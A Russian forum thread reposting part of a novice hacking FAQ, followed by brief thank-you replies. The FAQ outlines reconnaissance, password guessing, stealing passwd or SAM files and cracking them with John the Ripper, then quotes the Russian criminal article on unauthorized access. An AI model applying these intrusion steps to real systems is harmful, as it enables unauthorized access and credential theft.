Эта задача уже творческая и в общем случае не решаемая, это не голых баб качать. Начать следует, как и любое другое дело, со сбора информации. Определить версию OS, тип сервера, поискать дыры в CGI-скриптах, просканировать порты на предмет уязвимых сервисов. Попытаться подобрать слабые пароли к shell, ftp, pop3. В случае *nix попытаться стянуть passwd, в случае — windows sam._. через ftp или дыры в скриптах. А дальше нужно читать bugtraq, securityfocus и искать дырку. Но раз ты читаешь этот faq, то ты там мало чего поймешь. Изучай какой-нибудь язык программирования, например, С, принципы работы сети, протоколы, операционные системы…

12. У меня есть passwd, что с ним делать?
Сначала нужно посмотреть настоящий действительно ли там есть пароли. Если строчки выглядят примерно так: lpeery:*:276:15:Larry Peery:/usr/email/users/lpeery:/bin/csh, то все пароли содержатся в файле shadow и ты их никогда не увидишь. А если так: lpeery:YIJkAzKSxkz4M:276:15:Larry Peery:/usr/email/users/lpeery:/bin/csh, то файл надо попытаться расшифровать с помощью программ типа John the Ripper.

13. Что мне за это будет?
Если сделаешь что-то серьезное и дело дойдет до суда, то:
Статья 272 УК РФ. Неправомерный доступ к компьютерной информации.
1. Неправомерный доступ к охраняемой законом компьютерной информации, то есть информации на машинном носителе, в электронно-вычислительной машине (ЭВМ),
системе ЭВМ или их сети, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование информации, нарушение работы ЭВМ, системы ЭВМ или их сети, — наказывается штрафом в размере от двухсот до пятисот минимальных
размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от двух до пяти месяцев, либо исправительными работами на срок от шести месяцев до одного года, либо лишением свободы на срок до двух лет.
2. То же деяние, совершенное группой лиц по предварительному сговору или организованной группой, либо лицом с использованием своего служебного положения, а равно имеющим доступ к ЭВМ, системе ЭВМ или их сети, — наказывается штрафом в размере от пятисот до восьмисот минимальных размеров оплаты труда или в размерезаработной платы, или иного дохода осужденного за период от пяти до восьми месяцев, либо исправительными работами на срок от одного года до двух лет, либо арестом на срок от трех до шести месяцев, либо лишением свободы на срок до пяти лет.

Источник © inattack.ru
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
Очень полезная тема, Спасибо
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
Кул
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
с определениями согласен, но (вот сравнивая с другими статьями по этой теме) остальное мне кажется бредом
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
спасибо тебе)))
Иногда когда я чёто забываю наглядываюсь сюда)))
СПС Огромное))))))))))
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
прикольные уроки!!!
именно это я и искал! спасибо:D
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
да реально спасибо, классная темка
Тема закрыта
Тема закрыта